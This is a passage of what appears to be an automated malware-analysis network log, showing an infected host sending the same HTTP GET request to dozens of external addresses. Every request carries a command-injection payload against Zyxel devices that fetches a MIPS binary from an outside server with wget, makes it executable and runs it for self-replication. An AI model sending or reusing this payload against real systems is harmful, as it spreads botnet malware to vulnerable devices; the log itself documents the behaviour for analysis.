                                      Jan 14, 2024 15:50:54.482405901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6283192.168.2.1451412200.37.109.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482443094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6284192.168.2.1453438138.221.224.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482498884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6285192.168.2.144402419.50.86.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482523918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6286192.168.2.145117472.163.246.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482554913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6287192.168.2.143819677.7.96.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482618093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6288192.168.2.144642893.11.51.203443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482660055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6289192.168.2.145033468.197.172.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482692957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6290192.168.2.145601259.54.53.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482733011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6291192.168.2.145596084.242.53.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482758045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6292192.168.2.145803632.239.14.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482791901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6293192.168.2.143936450.50.155.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482811928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6294192.168.2.145518436.178.152.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482877970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6295192.168.2.1436160120.142.10.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482907057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6296192.168.2.144479487.95.62.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482928038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6297192.168.2.1441990152.29.188.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.482968092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6298192.168.2.143770470.22.243.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483010054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6299192.168.2.144224886.215.229.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483076096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6300192.168.2.1450284134.107.102.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483079910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6301192.168.2.145707282.186.145.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483143091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6302192.168.2.1445930208.226.146.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483176947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6303192.168.2.1454166194.96.52.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483200073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6304192.168.2.1456806221.191.244.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483262062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6305192.168.2.1443052212.236.206.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483295918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6306192.168.2.1450636117.173.224.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483326912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6307192.168.2.1436612130.69.188.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483386993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6308192.168.2.1459950144.33.100.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483427048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6309192.168.2.1435652145.191.228.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483448982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6310192.168.2.1448930126.152.4.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483500957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6311192.168.2.1449724198.252.140.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483525038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6312192.168.2.1448944171.204.56.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483576059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6313192.168.2.1451436105.124.58.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483608961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6314192.168.2.143702625.218.81.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483644009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6315192.168.2.1459446120.62.38.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483697891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6316192.168.2.1446294164.2.241.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483733892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6317192.168.2.14467968.110.72.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483766079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6318192.168.2.1448096106.120.65.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483819008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6319192.168.2.14593801.19.165.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483860970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6320192.168.2.1453910143.130.150.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483916044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6321192.168.2.144444269.110.165.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483947992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6322192.168.2.1450846209.45.192.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.483989954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6323192.168.2.1456618122.32.226.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484026909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6324192.168.2.1458502160.140.217.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484056950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6325192.168.2.1434516201.194.225.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484105110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6326192.168.2.1440292150.74.218.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484153986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6327192.168.2.1452286148.190.47.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484205961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6328192.168.2.1439070183.178.172.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484230042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6329192.168.2.143815678.201.105.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484272003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6330192.168.2.143731088.171.230.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484317064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6331192.168.2.1446320130.40.84.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484337091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6332192.168.2.144915636.108.5.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484385014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6333192.168.2.144174079.161.241.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484421015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6334192.168.2.1436446112.155.155.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484463930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6335192.168.2.144751617.131.181.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484508038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6336192.168.2.1445776154.48.51.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484539986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6337192.168.2.144867498.57.134.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484601021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6338192.168.2.1449110176.98.105.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484632969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6339192.168.2.145066220.0.251.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484668970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6340192.168.2.1441410169.214.150.166443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484705925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6341192.168.2.1438140108.57.88.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484743118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6342192.168.2.1440554147.74.202.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484807014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6343192.168.2.145056657.247.197.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484834909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6344192.168.2.1435244178.14.55.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:54.484880924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6345192.168.2.1433206184.206.221.252443
                                      TimestampBytes transferredDirectionData
